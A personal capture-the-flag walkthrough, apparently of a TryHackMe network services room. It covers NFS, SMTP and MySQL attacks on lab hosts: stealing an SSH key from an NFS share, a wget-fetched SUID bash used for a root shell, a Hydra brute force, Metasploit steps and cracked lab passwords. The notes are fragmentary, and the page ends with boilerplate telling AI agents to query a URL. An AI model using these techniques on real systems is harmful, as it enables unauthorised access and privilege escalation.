# Network Service #2

#### What is NFS?

NFS stands for "Network File System". Users and programs can access files on remote systems almost as if they were local files. Be accessed by clients with whatever privileges are assigned to each file.

#### How does NFS work?

Client will request to mount a directory from a remote host on a local directory

If someone wants to access a file using NFS, an RPC (Remote Procedure Call) call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:

#### What runs NFS?

Using the NFS protocol you can transfer files between computers running Windows and other non-Windows operating systems.

***

## Task 3 - Enumerating NFS

#### What is Enumeration?

"a process which establishes an active connection to the target hosts to discover potential attack vectors in the system, and the same can be used for further exploitation of the system."

#### Requirements

For more advanced enumeration of the NFS server: tools. `syntax: nfs-common`

#### NFS-Common

Important to have this package installed on any machine that uses NFS. It includes programs such as: lockd, statd, showmount, nfsstat, gssd, idmapd and mount.nfs. \[enumeration fase]

#### Port Scanning

The first step of enumeration is to conduct a port scan. You can go as in-depth as you like on this, however, I suggest using nmap with the -A and -p- tags.

#### Mounting NFS shares

Needs a directory where all the content shared by the host server in the export folder can be accessed. After create, you can use the "mount" command to connect the NFS share to the mount point.

`sudo mount -t nfs IP:share /tmp/mount/ -nolock`

***

### Starting Machine:

```
Nmap: 
```

```
List Files: 
```

`Syntax [List Server NFS]: /usr/sbin/showmount -e [IP]` 

```
Make Directory Files: 
```

`mkdir /tmp/mount` 

```
Connect the NFS share: 
```

`Syntax: sudo mount -t nfs 10.10.193.213:home /tmp/mount/ -nolock` 

```
Inside NFS Mount Point: 
```

```bash
Have a SSH, take "id_rsa" to connect.
```

```
Working with SSH(id_rsa): 
```

```bash
copy file > chmod 600 id_rsa > ssh -i id_rsa name@ip
```

`Syntax SSH Connect: ssh -i id_rsa name@ip`  `Syntax SSH Connect: ssh -i id_rsa cappucino@10.10.193.213`

```bash
Cappucino is the name of directory home of mount point.
```

***

## Task 4 - Exploiting NFS

#### We're done, right?

Not quite, escalate privileges.

#### What is root\_squash?

By default, on NFS root\_squash= prevent anyone connecting with root access to the NFS volume. Users are assigned a user “nfsnobody”. But, if root\_squash off, allow the creation of SUID bit files, allowing a remote user root access to the connected system.

#### SUID

This means that the file or files can be run with the permissions of the file(s) owner/group. As the super-user. We can leverage this to get a shell with these privileges!

#### Method

How SUID files work, we're able to upload files to the NFS share, and control the permissions of these files. We can set the permissions of whatever we upload, in this case a bash shell executable. We can then log in through SSH, as we did in the previous task- and execute this executable to gain a root shell!

#### The Executable

`Syntax: wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash // https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash`

#### Mapped Out Pathway:

#### Starting Machine#2:

```
Download Bash Rev Shell: 
```

`Syntax: wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash`  `Don't forgot chmod +s and sudo chown root bash.`

```
Open Server to SSH download Bash file: 
```

`Open Server on my machine`  `Ifconfig to IP`  `SSH download OU copiei o bash para o mount:`

```bash
cp bash /tmp/mount/cappucino
```

```bash
Syntax: wget ip:port/file [ip my machine= 10.10.60.175]

OBS: Não sei qual dos 3 é o certo, mas coloquei os 3 no file. sudo chmod +s bash / sudo chown root bash / [sudo chmod +x bash]
```

```
Execute bash file: 
```

`Syntax: ./bash -p` 

***

## Task 5 - Understanding SMTP

#### What is SMTP?

Simple Mail Transfer Protocol - sending of emails.

```
The SMTP server performs three basic functions: 
```

* It verifies who is sending emails through the SMTP server.
* It sends the outgoing mail
* If the outgoing mail can't be delivered it sends the message back to the sender

#### POP e IMAP

POP: "Post Office Protocol" and IMAP: Internet Message Access Protocol

#### How does SMTP work?

 \* \* \*

## Task 4 - Enumerating SMTP

```bash
Commands:
msfconsole -q
search smtp_version 
use 0 [select]
options
set RHOSTS [ip]
options
```

***

## Task 4 - Exploiting SMTP

#### What do we know?

1. user account name
2. type of SMTP server and OS

#### Preparation

Our port scan= only other open port on this machine is an SSH login. this information = bruteforce the password of the SSH login for our user using Hydra.

#### Hydra

`"hydra -t 16 -l USERNAME -P /usr/share/wordlists/rockyou.txt -vV 10.10.179.180 ssh"`  user: administrator // password: alejandro 

#### Login SSH

`Syntax: ssh USER@IP`   `Password: THM{who_knew_email_servers_were_c00l?}`

***

## Task 8 - Understanding / Enumerating MySQL

#### What is MySQL?

MySQL = relational database management system (RDBMS), based on SQL \[Structured Query Language].

#### Database

organised collection of structured data

#### RDBMS:

software or service used to create and manage databases based on a relational model.

```bash
"relational" means that data stored is organised as tables.
```

#### SQL:

most popular RDBMS software implementations. It uses a client-server model and communicate with Structured Query Language (SQL).

#### How does MySQL work?

MySQL= RDBMS, help in the administration of MySQL databases.

***

## Task 9 - Enumerating MySQL

#### The Scenario

we're going to assume that you found the **Credentials**: "*root:password*"

#### Enumerating

 Port with server MySQL= 3306.

Have credentials, check manually: `syntax:`  mysql -h 10.10.248.46 -u root -p 

## Exploit with metasploit:

`Use` 

`Set server credentials` 

`Result with SQL Option default:` 

`With SQL Option "show databases"` 

```bash
4 databases.
```

***

## Task 10 - Exploiting MySQL

#### What do we know?

* 1. MySQL server credentials
* 2. The version of MySQL running
* 3. The number of Databases, and their name

```bash
note: to use exploits now we need to understand a key terms.
```

#### Schema

`key terminology case:`

```bash
CREATE SCHEMA == CREATE DATABASE
SCHEMA == DATABASE
```

In the Oracle Database product, a schema represents only a part of a database: the tables and other objects owned by a single user.

#### Hashes

Cryptographic algorithm to turn a variable length input into a fixed length output.

#### Exploiting

`Use:`   fine.

`Use:`   `Set Options and Exploit`  `Crack password:`  `File with hash:`  `Here:`  `Using User: carl // Password: doggie` `Nmap hase ssh`  `ssh carl@10.10.103.105`  `take thm_ctf:` 

***


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://public-8.gitbook.io/rapha/ctfs/tryhackme/rooms/network-service-2.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.